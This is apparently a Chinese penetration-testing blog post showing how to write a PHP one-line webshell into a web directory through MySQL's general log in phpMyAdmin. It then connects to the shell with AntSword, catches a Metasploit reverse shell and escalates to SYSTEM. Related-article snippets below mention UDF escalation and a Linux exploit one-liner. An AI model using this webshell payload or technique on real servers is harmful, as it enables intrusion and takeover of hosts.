通过MySql写入一句话进行提权

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量330 收藏 3
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zgwz123456/article/details/115013155
版权

本次实战直接以phpMyAdmin里进行sql语句操作
1.show variables like “general_log%”
在这里插入图片描述
将general_log改成ON就可以进行mysql日志输出保存了
在这里插入图片描述
将general_log_file改成能执行php的目录下,即网站目录下
在这里插入图片描述
查看我们修改后的配置
在这里插入图片描述
写入我们的一句话木马

select "<?php @eval($_REQUEST['cmd']);?>

在这里我们可以看到成功写入了
在这里插入图片描述
用蚁剑连接
在这里插入图片描述
接下来我们用msf进行提权,打开kali,这里的LHOST是kali的地址
在这里插入图片描述
生成木马后上传,然后kali监听6666号端口,然后用蚁剑执行exe
查看配置
在这里插入图片描述
在这里插入图片描述
木马执行成功,成功反弹shell给msf
在这里插入图片描述
看一下身份
在这里插入图片描述
还是普通权限。接下来提权
在这里插入图片描述
成功获得system权限!!!

zgwz123456
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过sql注入进行权限提升操控主机
maluxiao123的博客
04-01 1610
前面将sql注入的基础已经介绍完了,那么可能很多初学者不知道我们为什么要进行sql注入,除了拿到数据库以外还有什么用,所以今天来理一理,通过sql注入,能否提升权限,拿到主机shell呢。 这里主要有两种方式 1.通过into outfile ...
mysql提权数据不含表头_mysql提权总结方法四则
weixin_36165880的博客
01-26 184
查看扩展路径,mysql 5.1 需要将udf.dll文件放在lib\plugin下面show variables like '%plugin%'加载失败可以尝试先删掉扩展名:delete from mysql.func where name='cmdshell'一 UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:create function cmdshell return...
数据库之Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 1149
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
linux一句话提权
weixin_30709635的博客
04-27 349
不多说,看命令:‍[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever sh-3.2# uname -aLinux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21...
mysql提权总结
蚁景网安学院
09-17 634
前言前两天参加了省赛的内网渗透,在拿到webshell后发现是一个站库分离,通过信息搜集得到了数据库的账号密码,但是是一个www-data权限,执行不了代理的命令,这时候就需要提权到roo...
MySQL导出一句话拿WebShell的方法
06-19
### MySQL导出一句话拿WebShell的方法 在网络安全与渗透测试领域中,“拿WebShell”是一种常见操作,通过这种手段,安全研究人员或攻击者能够在目标服务器上执行任意代码,从而达到控制服务器的目的。本文将详细...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
攻击者通过`UNION SELECT`结合`INTO OUTFILE`将PHP代码(通常是一句话木马)写入指定的Web目录。为了成功执行此操作,需要满足以下条件: - `secure_file_priv`配置项允许数据导出到Web目录。 - 数据库用户具有`FILE...
MySql手工注入.doc#资源达人分享计划#
08-12
8. **利用`INTO OUTFILE`导出数据**:如果攻击者拥有写入网站目录的权限和数据库的`INTO OUTFILE`权限,可以将数据导出到服务器上的文件,如:`AND 1=2 UNION SELECT 1, '一句话的16进制', 3 INTO OUTFILE '网站物理...
223TJ智网杯电子数据取证比武团体赛60页WP,不能再详细了
03-04
成功写入一句话木马的时间 - **解析**: 未提供具体时间信息,需要分析服务器日志或恶意代码植入时间戳来确定。 以上解析基于给定的文件描述信息,对于未明确指出的部分,需要进一步调查和分析才能得出准确答案。
2021护网行动面试题目.pdf
03-30
8. 木马或一句话免杀任意代码执行:传统上,使用`eval()`函数可以执行字符串中的PHP代码,但由于其危险性,官方已明确说明需要谨慎使用。 以上知识点涵盖了网络攻防中,针对数据库攻击者可能采用的技巧、漏洞利用及...
晨讲面试题.docx
01-04
- 利用MySQL注入点写入一句话木马通常需要root权限和网站的绝对路径。不同的服务器容器(如IIS、Nginx、Apache、Lighttpd)在不同版本下存在特定的解析漏洞,可以通过特定的URL构造方法触发。 6. **操作系统识别**...
渗透测试面试题基础版 网安人必须要掌握的知识点.rar
02-14
、ysql注入点,用工具对目标站直接写入一句话,需要哪些条件?、目前已知哪些版本的容器有解析漏洞,具体举例、如何手工快速判断目标站是windows还是linux服务器?、为何一个mysql数据库的站,只有一个80端口开放?...
渗透测试面试题2019版.pdf
03-14
- 若想通过工具直接向目标站写入一句话木马,则需要拥有root权限并知道网站的具体路径。 **10. 解析漏洞** - 介绍了不同版本的服务器容器存在的解析漏洞及其利用方式。 - 如IIS 6.0/7.0/7.5、Nginx、Apache、...
渗透测试工程师面试题大全.pdf
07-02
7. MySQL 注入点,用工具对目标站直接写入一句话,需要 root 权限以及网站的绝对路径,并且需要 load_file() 读取文件操作和 union select 查询。 8. 目前已知哪些版本的容器有解析漏洞,包括 IIS 6.0、IIS 7.0/7.5...
ThinkCMF 任意内容包含getshell漏洞
10-26
1. 由于 thinkcmf2.x 使用了 thinkphp3.x 作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的 PHP 代码写入 data/runtime/Logs/Portal 目录下的日志文件...
mysql一句话代码_mysql 写入一句话
weixin_39796140的博客
01-18 580
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上如果为一个目录,如:secure_file_priv = /hom...
用linux往mysql写入实时日志_MySQL将语句写入到binlog二进制日志中
weixin_29208077的博客
01-31 229
由于二进制日志是公共资源,所有线程都要写二进制日志,所以一定要避免两个线程同时更新二进制日志。因此,在事件组写二进制日志时,二进制日志将获得一个互斥锁LOCK_log,然后在事件组写完后释放,由于服务器所有的会话都向二进制日志写事务,所以这个锁经常会阻塞某些会话线程。1 写入DML语句通常是指DELETE/INSERT/UPDATE语句,为保证一致性,MySQL写入二进制日志时同时获得事务级锁,...
mysql数据库提权
m0_63197559的博客
04-10 988
MySQL数据库提权学习总结
渗透测试面试必备:信息收集与MySQL安全要点
7. **MySQL注入写入一句话**:实现MySQL注入写入文件通常需要root权限、网站的绝对路径、load_file()函数或into outfile语句的支持,且需要满足特定的权限和过滤条件。 这些面试题反映了渗透测试工程师需要具备的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值